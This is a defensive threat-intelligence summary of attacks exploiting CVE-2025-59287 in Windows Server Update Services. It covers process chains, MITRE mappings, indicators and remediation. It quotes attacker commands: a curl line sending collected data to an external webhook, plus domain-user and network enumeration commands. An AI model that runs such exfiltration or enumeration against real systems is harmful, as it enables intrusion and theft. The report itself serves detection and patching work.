Microsoft released an out‑of‑band updates on October 23 for an unauthenticated deserialization remote code execution vulnerability in Windows Server Update Services (CVE-2025-59287) that has been exploited against publicly exposed WSUS instances on ports 8530/8531. Huntress observed attackers sending crafted POST requests to WSUS web services, spawning cmd.exe and powershell.exe via wsusservice.exe and w3wp.exe, decoding a base64 PowerShell payload that enumerated hosts and exfiltrated data to a remote webhook. #CVE-2025-59287 #WSUS
Keypoints
- Microsoft released an out‑of‑band security update for CVE-2025-59287, a deserialization RCE in WSUS affecting AuthorizationCookie.
- Exploitation was observed beginning ~2025-10-23 23:34 UTC against WSUS instances exposed on default ports 8530/TCP and 8531/TCP.
- Attackers sent multiple crafted POST requests to WSUS web services (ReportingWebService, SimpleAuthWebService, ClientWebService, ApiRemoting30) to trigger the vulnerability.
- Compromise chains included wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe.
- A base64-encoded PowerShell payload was decoded and executed to enumerate domain users and network configuration, then exfiltrate results to a remote webhook (HTTP PUT / curl -k).
- Proxy networks were used by attackers to obfuscate and conduct exploitation activity.
- Remediations: apply Microsoft’s WSUS security update and block inbound TCP ports 8530/8531 except for required management and Microsoft Update hosts.
MITRE Techniques
- [T1210] Exploitation of Remote Services – Attackers targeted WSUS instances on default ports 8530/8531 and sent specially crafted POST requests to web services to trigger a deserialization RCE against the AuthorizationCookie. Quote: ‘POST /ReportingWebService/ReportingWebService.asmx (get_server_id)’
- [T1505] Server Software Component – Exploitation leveraged vulnerabilities in WSUS service components (AuthorizationCookie deserialization) to execute code in service processes. Quote: ‘CVE-2025-59287 — WSUS Unauthenticated Remote Code Execution’
- [T1059] Command and Scripting Interpreter – cmd.exe and powershell.exe were spawned from wsusservice.exe and w3wp.exe to run commands and decode a base64 PowerShell payload. Quote: ‘wsusservice.exe → cmd.exe → cmd.exe → powershell.exe’
- [T1041] Exfiltration Over C2 Channel – Collected enumeration output was sent to an external webhook URL using HTTP PUT or curl. Quote: ‘http://webhook.site/[REDACTED]’; ‘curl.exe -k $w –data-binary $r’
- [T1090] Proxy – Attackers used proxy networks to conduct and obfuscate exploitation activity. Quote: ‘use of proxy networks being leveraged to conduct exploitation.’
Indicators of Compromise
- [File Path] WSUS and HTTP log files to review – C:Program FilesUpdate ServicesLogfilesSoftwareDistribution.log, C:inetpublogsLogFilesW3SVC*u_ex*.log
- [Process/Binary] Observed malicious process chains – wsusservice.exe, w3wp.exe
- [Network/URL] Exfiltration webhook and referenced WSUS endpoint – http://webhook.site/[REDACTED], https://[REDACTED]:8531 (and webhook indicator examples)
- [HTTP Requests] Malicious POST endpoints observed – POST /ReportingWebService/ReportingWebService.asmx, POST /SimpleAuthWebService/SimpleAuth.asmx, POST /ClientWebService/Client.asmx, POST /ApiRemoting30/WebService.asmx
- [Commands] Observed enumeration commands – ‘whoami; net user /domain’, ‘net user /domain; ipconfig /all’